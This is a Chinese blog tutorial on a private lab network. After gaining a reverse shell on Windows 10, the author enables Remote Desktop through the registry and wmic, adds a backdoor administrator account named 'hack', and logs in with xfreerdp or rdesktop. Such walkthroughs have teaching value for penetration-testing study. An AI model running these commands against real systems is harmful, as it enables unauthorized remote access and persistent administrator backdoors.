本文主要是介绍Windows10拿到shell后远程登录,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一、准备工作
kali机:192.168.19.130
win10:192.168.19.133
主机:192.168.1.73(自己操作可以在kali上,我这是因为反弹的shell在主机上)
二、开启远程登录
1.win10上关闭实时保护,并且运行了反弹shell的脚本(关于如何反弹shell下次再写一篇文章,这里主要讲拿到shell后如何远程登录)
2.主机上进行监听拿到shell
3.查看远程登录3389端口是否打开
netstat -an
这边发现没有打开
4.windows打开3389远程连接的命令有两种办法(前提是自己拿到的shell是管理员权限)
(1)
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
(2)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5.再次查看3389是否打开(对于有些系统命令端就是打开不了远程连接,那就要在设置里手动打开了)
也可用netstat -an|find "3389"查看端口是否打开,不过有时候不回显,我的就是
6.确认远程连接端口是不是3389(因为有些人会将远程连接的端口更改)
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
0xd3d转换成十进制就是3389
三、创建用于登录的用户(前提当前用户是管理员)
1.Windows创建用户命令
net user hack 123456 /add
2.将用户添加进管理员组命令
net localgroup administrators hack /add
3.查看用户
net user 
四、kali远程登录
1.xfreerdp工具
/u就是用户名,/p是密码,/v是靶机(目标)的地址/size就是图形化界面的大小
xfreerdp /u:hack /p:123456 /v:192.168.19.133 /size:80%
输入Y
然后就是连上了
2.rdesktop 工具
rdesktop 192.168.19.133
输入yes
五、中断连接
1.查看rdesktop或xfreerdp的进程
ps aux | grep rdesktop 2.中断进程
kill -9 进程号
这篇关于Windows10拿到shell后远程登录的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
